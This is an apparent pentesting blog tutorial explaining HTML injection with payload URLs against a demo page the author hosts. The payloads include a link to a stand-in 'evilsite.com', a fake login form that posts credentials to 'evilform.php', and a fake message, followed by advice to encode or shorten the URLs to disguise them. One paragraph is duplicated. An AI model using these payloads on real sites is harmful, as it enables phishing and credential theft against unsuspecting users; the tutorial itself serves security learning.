WebApp Pentesting:What is HTML Injection
Tuesday, March 29, 2016
By
Jitendra
Hi Everyone
So In this post we will talk about HTML injection.
HTML injection is similar to Cross Site Scripting (XSS) attack. But in XSS we insert malicious Script Tags to run JavaScript but in HTML injection we use HTML tag in order to modify the page for malicious purposes.
Why HTML injection Happens ?
When an application does not properly handle user supplied data, an attacker can supply valid HTML, typically via a parameter value, and inject their own content into the page.
So to demonstrate this I have hosted a vulnerable webpage on http://htmli.comlu.com/html.php
When you visit to this page you can see that on that webpage it says
Hi Mr Thanks for looking here
Now you can give a parameter to this by just adding ?name=ANY_HTML_VAlue so the final url will be
http://htmli.comlu.com/html.php?name=ANY_VALUE.
lets try to exploit it.
here first we will put some content in <b> tag
use this url and you can see that some text is in dark black http://htmli.comlu.com/html.php?name=<b>html-injection</b>
When you visit to this page you can see that on that webpage it says
Hi Mr Thanks for looking here
Now you can give a parameter to this by just adding ?name=ANY_HTML_VAlue so the final url will be
http://htmli.comlu.com/html.php?name=ANY_VALUE.
lets try to exploit it.
here first we will put some content in <b> tag
use this url and you can see that some text is in dark black http://htmli.comlu.com/html.php?name=<b>html-injection</b>
Redirecting user to malicious site
http://htmli.comlu.com/html.php?name=<a href="evilsite.com">Click here to login</a>
Creating a Fake login form
http://htmli.comlu.com/html.php?name=<form action="evilform.php" method="post"><input type="text" name="user" placeholder="username"></br><input type="password" name="pass" placeholder="pass"><!--
I used comment tag in the last of the form so all other content of the form will be commented out and that will not be displayed on the page.
Displaying a Fake Message
To display a fake message you can use this http://htmli.comlu.com/html.php?name=<p>we have changed our website login page please go to evilsite.com for login</p>
So you can encode the url or you can shorten the url using any of the url short service like goo.gl
Thats All for this post
Hope you enjoyed it.
Suggestion are welcome. Please do comment below for your feedback.
Thanks
Jitendra Kumar Singh(Team Computer Korner)
Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!
Written by CK Admins
Computer Korner is an open knowledge sharing site, where the we try to share our experience with IT, Security, Networking, System Administration tasks faced in day to day life. Articles from visitors are highly appreciated. Contact Us at : Click Here
![Admin Login Page Finder [FIND HIM]](http://3.bp.blogspot.com/-GhtWWRl4-xU/UB0hynJzAQI/AAAAAAAAAlA/7awzEtAFL0w/s72-c/mysqladded.PNG){kind=small}
0 comments: